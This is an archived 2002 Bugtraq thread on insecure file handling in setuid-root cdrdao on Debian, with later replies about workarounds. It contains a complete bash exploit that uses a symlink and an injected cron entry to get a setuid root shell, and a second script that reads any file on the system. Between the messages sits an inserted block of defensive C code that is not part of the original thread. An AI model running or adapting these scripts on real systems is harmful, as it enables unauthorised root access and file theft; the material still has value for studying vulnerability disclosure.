7804672 2002-01-13 00:09 +0100  /86 lines/ Jens Steube <jsteube@lastflood.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-14  21:09  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20508>
Subject: cdrdao insecure filehandling
------------------------------------------------------------
From: Jens Steube <jsteube@lastflood.com>
To: bugtraq@securityfocus.com
Message-ID: <1010876960.3c40c220caef8@troja.dnsalias.org>


--[ Description ]--

There are several security-related bugs in the distributed
Debian (SID) package of CDRDAO, a program to write audio or mixed
mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid root
by default.


--[ Version ]--

Name: Cdrdao 
Version: 1.1.5 
Author: Andreas Mueller <andreas@daneb.de>


--[ Impact ]--

Local users can gain unauthorized root access to the system.


--[ Legal ]--

The information in this advisory may be distributed or
reproduced, provided that the advisory is not modified in any way.
The author makes no warranties of any kind regarding the information
contained in this security advisory.


--[ Bugs ]--

Cdrdao doesn't check permissions when it tries to open a file
as its "toc-file". So it was possible to open all files on the
system, but it skips the output in its error message. Maybe it is
possible to trick it into reading all these files. As I tested around to
trick it, I found another bug.

The more important bug is that cdrdao can also write a
config file, which is written to "$HOME/.cdrdao". It is written by
the root user and not as the user who starts cdrdao. It is possible
to include data in the written config file, and so it is possible to
gain root via a symlink attack on $HOME/.cdrdao.

After I found these bugs I stopped searching for more.


--[ Fix ]--

I have not tried to fix it.

The author, the Debian package maintainer and the Debian
Bug Tracking System (#127930) were informed one week before
this post, but there was no response.


--[ Tested on ]--

Debian GNU/Linux SID on i386, installed gcc and running cron


--[ Credits ]--

Found and exploited by Jens "atomi" Steube.

Greets go out to: impulse, symbiont, mot, para, sharkking, kartan
and all other friends on #altoetting and #perl.de on IRCnet.


--[ Proof of concept exploit ]--

The attached exploit is designed for the Debian (SID) package
and not tested on other systems.



Regards,

Jens Steube
jsteube@lastflood.com
(7804672) /Jens Steube <jsteube@lastflood.com>/-----
Attachment (application/octet-stream) in text 7804673
Comment in text 7814440 by Guillaume PELAT <guillaume.pelat@intexxia.com>
Comment in text 7815634 by Anthony DeRobertis <asd@suespammers.org>
7804673 2002-01-13 00:09 +0100  /62 lines/ Jens Steube <jsteube@lastflood.com>
Imported: 2002-01-14  21:09  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20509>
Attachment (text/plain) to text 7804672
Subject: Attachment to: cdrdao insecure filehandling
------------------------------------------------------------
#!/bin/bash

## cdrdaohack.sh by Jens "atomi" Steube

ROOTEXECDIR="/etc/cron.d/cdr"   # root-owned cron fragment the config write is redirected to
CDRDAO="/usr/bin/cdrdao"
USERCONF="$HOME/.cdrdao"        # config file that "cdrdao --save" writes as root

echo "Testing $CDRDAO"
if [ ! -u "$CDRDAO" ]; then
  echo "ERROR: $CDRDAO is not setuid or does not exist"
  exit 1
fi

echo "Generating Helper Files"

# Helper compiled by the cron job: removes the traces and starts a root shell.
cat > /tmp/daosh.c << EOF
#include <unistd.h>
int main () {
setuid(0); setgid(0);
unlink("/tmp/dao.sh");
unlink("/tmp/daosh.c");
unlink("/etc/cron.d/cdr");
unlink("$HOME/.cdrdao");
execl("/bin/bash","bash","-i",(char *)0);
return 0;
}
EOF

# Job run by cron as root: builds the helper and makes it setuid root.
cat > /tmp/dao.sh << EOF
cc -o /tmp/daosh /tmp/daosh.c >/dev/null 2>&1
chown root /tmp/daosh >/dev/null 2>&1
chgrp root /tmp/daosh >/dev/null 2>&1
chmod 6755 /tmp/daosh >/dev/null 2>&1
exit 0
EOF

chmod 700 /tmp/dao.sh

echo "Backing up original $USERCONF file to $USERCONF.orig"
mv "$USERCONF" "$USERCONF.orig" >/dev/null 2>&1

echo "Creating Symlink on $USERCONF to $ROOTEXECDIR"
ln -s "$ROOTEXECDIR" "$USERCONF"

echo "Executing $CDRDAO"

# The option values contain newlines, so the saved config carries a crontab line.
$CDRDAO write --save --device '
* * * * * root /tmp/dao.sh >/dev/null 2>&1
#' --buffers '
' . >/dev/null 2>&1

echo "Waiting for Rootshell, wait at least 3 minutes"
while [ ! -u /tmp/daosh ]; do
  echo -n "."
  sleep 1
done

echo
echo "Entering Rootshell and removing Helper Files"
echo "Have Phun :-)"
/tmp/daosh
(7804673) /Jens Steube <jsteube@lastflood.com>/-----
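Both bugs in the advisory come from a setuid-root program opening user-supplied paths with root's privileges: the toc file is read as root, and the config file is created as root through whatever $HOME/.cdrdao points at. The following is an added example (not cdrdao's code, nor anything from the advisory author) of how such a program can do both operations safely: the effective ids are lowered to the invoking user around the open(), O_NOFOLLOW refuses a symlink in the final path component, and the created config is kept only if it is a regular file the user owns. The function names are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a user-supplied path with only the invoking user's privileges.
 * The effective ids are lowered to the real ids around the open(), so the
 * kernel enforces the user's own permissions (no arbitrary toc-file reads),
 * and O_NOFOLLOW refuses a symlink in the final component, which is what
 * redirected the root-owned $HOME/.cdrdao write into /etc/cron.d. */
int open_as_invoker(const char *path, int flags, mode_t mode) {
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    int fd, saved;

    if (setegid(rgid) == -1 || seteuid(ruid) == -1) return -1; /* gid first: needs uid 0 */
    fd = open(path, flags | O_NOFOLLOW | O_CLOEXEC, mode);
    saved = errno;
    if (seteuid(euid) == -1 || setegid(egid) == -1) { /* re-raise for device access */
        if (fd != -1) close(fd);
        errno = EPERM;
        return -1;
    }
    errno = saved;
    return fd;
}

/* First bug: the toc file must be readable by the user, not just by root. */
int open_toc_file(const char *path) {
    return open_as_invoker(path, O_RDONLY, 0);
}

/* Second bug: the config is created as the user, never through a symlink,
 * and only kept if the result is a regular file the user owns. */
int open_user_config(const char *path) {
    struct stat st;
    int fd = open_as_invoker(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd == -1) return -1;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}
```

When the binary is not setuid, the seteuid/setegid calls are no-ops and the functions degrade to plain opens with O_NOFOLLOW.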
7814440 2002-01-15 10:45 +0100  /29 lines/ Guillaume PELAT <guillaume.pelat@intexxia.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-15  23:56  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20535>
Comment on text 7804672 by Jens Steube <jsteube@lastflood.com>
Subject: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Guillaume PELAT" <guillaume.pelat@intexxia.com>
To: <bugtraq@securityfocus.com>
Message-ID: <006501c19da9$688ed6f0$4d3e010a@intexxiaxh2dm7>


"Jens Steube" <jsteube@lastflood.com> wrote in message
news:1010876960.3c40c220caef8@troja.dnsalias.org...
> --[ Bugs ]--
>
> Cdrdao doesn't check permissions when it tries to open a file
> as its "toc-file". So it was possible to open all files on the
> system, but it skips the output in its error message. Maybe it is
> possible to trick it into reading all these files.

I confirm it is possible to read all these files using the show-data
command.  A proof of concept script is attached.

--
Guillaume Pelat
Security Expert

INTEXXIA
171 Av. Georges Clemenceau
92024 NANTERRE CEDEX - FRANCE
tel: +33 1 55 69 49 10
fax:  +33 1 55 69 78 80
http://www.intexxia.com
(7814440) /Guillaume PELAT <guillaume.pelat@intexxia.com>/(Rewrapped)
Attachment (application/octet-stream) in text 7814441
7814441 2002-01-15 10:45 +0100  /28 lines/ Guillaume PELAT <guillaume.pelat@intexxia.com>
Attachment filename: "show_file.sh"
Imported: 2002-01-15  23:56  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20536>
Attachment (text/plain) to text 7814440
Subject: Attachment (show_file.sh) to: Re: cdrdao insecure filehandling
------------------------------------------------------------
#!/bin/sh

if [ "$1" ]; then
	cat > /tmp/t.c <<EOF
#include <stdio.h>
int     main()
{
	int     i;
	while (fscanf(stdin, "%i", &i) > 0)
	{
		printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
	}
	return 0;
}
EOF
	cat > /tmp/t.toc <<EOF
CD_ROM
TRACK MODE1_RAW
FILE "$1" 0
EOF
	gcc /tmp/t.c -o /tmp/show
	echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | sed 's/.*://g' ` | /tmp/show
	rm -f /tmp/t.c /tmp/show /tmp/t.toc
else
	echo "Syntax: $0 filename"
fi
(7814441) /Guillaume PELAT <guillaume.pelat@intexxia.com>/
7815634 2002-01-15 07:12 -0500  /14 lines/ Anthony DeRobertis <asd@suespammers.org>
Sent by: joel@lysator.liu.se
Imported: 2002-01-16  08:31  by Brevbäraren
External recipient: Jens Steube <jsteube@lastflood.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20549>
Comment on text 7804672 by Jens Steube <jsteube@lastflood.com>
Subject: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Anthony DeRobertis" <asd@suespammers.org>
To: Jens Steube <jsteube@lastflood.com>
Cc: bugtraq@securityfocus.com
Message-ID: <E16QSRj-0006F6-00@asd.ppp0.com>

A workaround on Debian is to:

dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao

This tells dpkg that cdrdao is not to be suid root anymore, at least
until you change or delete that override.
(7815634) /Anthony DeRobertis <asd@suespammers.org>/(Rewrapped)
Attachment (application/pgp-signature) in text 7815635
Comment in text 7823964 by martin f krafft <madduck@madduck.net>
7815635 2002-01-15 07:12 -0500  /10 lines/ Anthony DeRobertis <asd@suespammers.org>
Imported: 2002-01-16  08:31  by Brevbäraren
External recipient: Jens Steube <jsteube@lastflood.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20550>
Attachment (text/plain) to text 7815634
Subject: Attachment to: Re: cdrdao insecure filehandling
------------------------------------------------------------
(7815635) /Anthony DeRobertis <asd@suespammers.org>/
7823964 2002-01-16 14:49 +0100  /29 lines/ martin f krafft <madduck@madduck.net>
Sent by: joel@lysator.liu.se
Imported: 2002-01-17  03:33  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20574>
Comment on text 7815634 by Anthony DeRobertis <asd@suespammers.org>
Subject: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: martin f krafft <madduck@madduck.net>
To: bugtraq@securityfocus.com
Message-ID: <20020116134913.GG16146@fishbowl.madduck.net>

also sprach Anthony DeRobertis <asd@suespammers.org> [2002.01.15.1312 +0100]:
> dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao 
> 
> This tells dpkg that cdrdao is not to be suid root anymore, at least until 
> you change or delete that override. 

but then you have to be root to burn CDs. there is a reason why cdrdao
is setuid - it needs access to root-owned device files like /dev/scd0
and /dev/sg0 (on Linux that is).

i believe the right solution is to create a new group just for that,
and chgrp these device files to that group. then cdrdao works
non-setuid, and you have user-level control over who should be able
to use the burner, and who shouldn't.

-- 
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck
  
"when I was a boy I was told
 that anybody could become president.
 now i'm beginning to believe it."
                                                    -- clarence darrow
(7823964) /martin f krafft <madduck@madduck.net>/(Rewrapped)
Attachment (application/pgp-signature) in text 7823965
Comment in text 7828788 by Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
Comment in text 7858909 by Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>
7823965 2002-01-16 14:49 +0100  /10 lines/ martin f krafft <madduck@madduck.net>
Imported: 2002-01-17  03:33  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20575>
Attachment (text/plain) to text 7823964
Subject: Attachment to: Re: cdrdao insecure filehandling
------------------------------------------------------------
(7823965) /martin f krafft <madduck@madduck.net>/---
7828788 2002-01-17 01:22 +0000  /30 lines/ Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
Sent by: joel@lysator.liu.se
Imported: 2002-01-17  18:20  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: strange@nsk.yi.org
Recipient: Bugtraq (import) <20580>
Comment on text 7823964 by martin f krafft <madduck@madduck.net>
Subject: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
To: bugtraq@securityfocus.com
Message-ID: <20020117012228.A7440@nsk.yi.org>

On Wed, Jan 16, 2002 at 02:49:13PM +0100, martin f krafft wrote:
> but then you have to be root to burn CDs. there is a reason why cdrdao
> is setuid - it needs access to root-owned device files like /dev/scd0
> and /dev/sg0 (on Linux that is).

On RedHat's distribution, and I believe on many others based on PAM, the
owner of those files (or any others so configured) is changed to the
user on the console when he logs in.

The PAM module responsible for the change of permissions is
pam_console.so, and the file describing the permissions is
/etc/security/console.perms.  Just see man pam_console for more
details.

Regards,
Luciano Rocha

PS: obviously, I don't know whether Debian uses PAM or not...

-- 
Luciano Rocha, strange@nsk.yi.org

The trouble with computers is that they do what you tell them, not
what you want.
                -- D. Cohen
(7828788) /Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>/(Rewrapped)
7858909 2002-01-20 01:03 +0100  /25 lines/ Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>
Sent by: joel@lysator.liu.se
Imported: 2002-01-22  06:13  by Brevbäraren
External recipient: martin f krafft <madduck@madduck.net>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20618>
Comment on text 7823964 by martin f krafft <madduck@madduck.net>
Subject: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Pavel Kankovsky" <peak@argo.troja.mff.cuni.cz>
To: martin f krafft <madduck@madduck.net>
Cc: bugtraq@securityfocus.com
Message-ID: <20020120004712.AC6.0@bobanek.nowhere.cz>

On Wed, 16 Jan 2002, martin f krafft wrote:

> but then you have to be root to burn CDs. there is a reason why cdrdao
> is setuid - it needs access to root-owned device files like /dev/scd0
> and /dev/sg0 (on Linux that is).
> 
> i believe the right solution is to create a new group just for that, and
> chgrp these device files to that group. then cdrdao works non-setuid,
> and you have user-level control over who should be able to use the
> burner, and who shouldn't.

AFAIK, Linux /dev/sgX makes it possible to send virtually any SCSI
command to the device without any serious sanity checking done by
the kernel. After all, G stands for generic. It is not a good idea to
give such a power directly into the hands of users.

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
(7858909) /Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>/